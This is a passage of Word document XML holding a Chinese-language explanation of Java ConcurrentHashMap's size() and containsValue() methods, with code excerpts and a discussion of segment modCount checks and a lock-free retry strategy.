      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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else</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return</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)sum;  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573A3A" w:rsidRPr="00F41A4C" w:rsidRDefault="00573A3A" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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4B780C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size</w:t>
      </w:r>
      <w:r w:rsidRPr="004B780C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法主要思路是先在没有锁的情况下对所有段大小求和，如果不能成功（这是因为遍历过程中可能有其它线程正在对已经遍历过的段进行结构性更新）</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，最多执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RETRIES_BEFORE_LOCK</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>次，如果还不成功就在持有所有段锁的情况下再对所有段大小求和。在没有锁的情况下主要是利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>modCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>进行检测，在遍历过程中保存每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>modCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，遍历完成之后再检测每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>modCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>有没有改变，如果有改变表示有其它线程正在对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>进行结构性并发更新，需要重新计算。</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其实这种方式是存在问题的，在第一个内层</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>循环中，在这两条语句</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>sum += segments[i].count; mcsum += mc[i] = segments[i].modCount;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>之间，其它线程可能正在对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Segment</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>进行结构性的修改，导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>segments[i].count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>segments[i].modCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>读取的数据并不一致。这可能使</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法返回任何时候都不曾存在的大小，很奇怪</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>javadoc</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>居然没有明确标出这一点，可能是因为这个时间窗口太小了吧。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>size()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的实现还有一点需要注意，必须要先</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>segments[i].count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，才能</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>segments[i].modCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，这是因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>segment[i].count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>是对</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>变量的访问，接下来</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>segments[i].modCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>才能得到几乎最新的值（前面我已经说了为什么只是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>几乎</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>了）。这点在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>containsValue</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方法中得到了淋漓尽致的展现：</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b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>public</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boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> containsValue(Object value) {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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (value == </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</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throw</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new</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> NullPointerException();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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// See explanation of modCount use above</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final</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> Segment&lt;K,V&gt;[] segments = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.segments;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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[] mc = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>new</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>[segments.length];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color w:val="008200"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>// Try a few times without locking</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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> k = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; k &lt; RETRIES_BEFORE_LOCK; ++k) {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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> sum = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> mcsum = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> i = </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>; i &lt; segments.length; ++i) {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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> c = segments[i].count;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mcsum += mc[i] = segments[i].modCount;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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> (segments[i].containsValue(value))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lastRenderedPageBreak/>
        <w:t>                </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7F0055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>return</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true</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boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
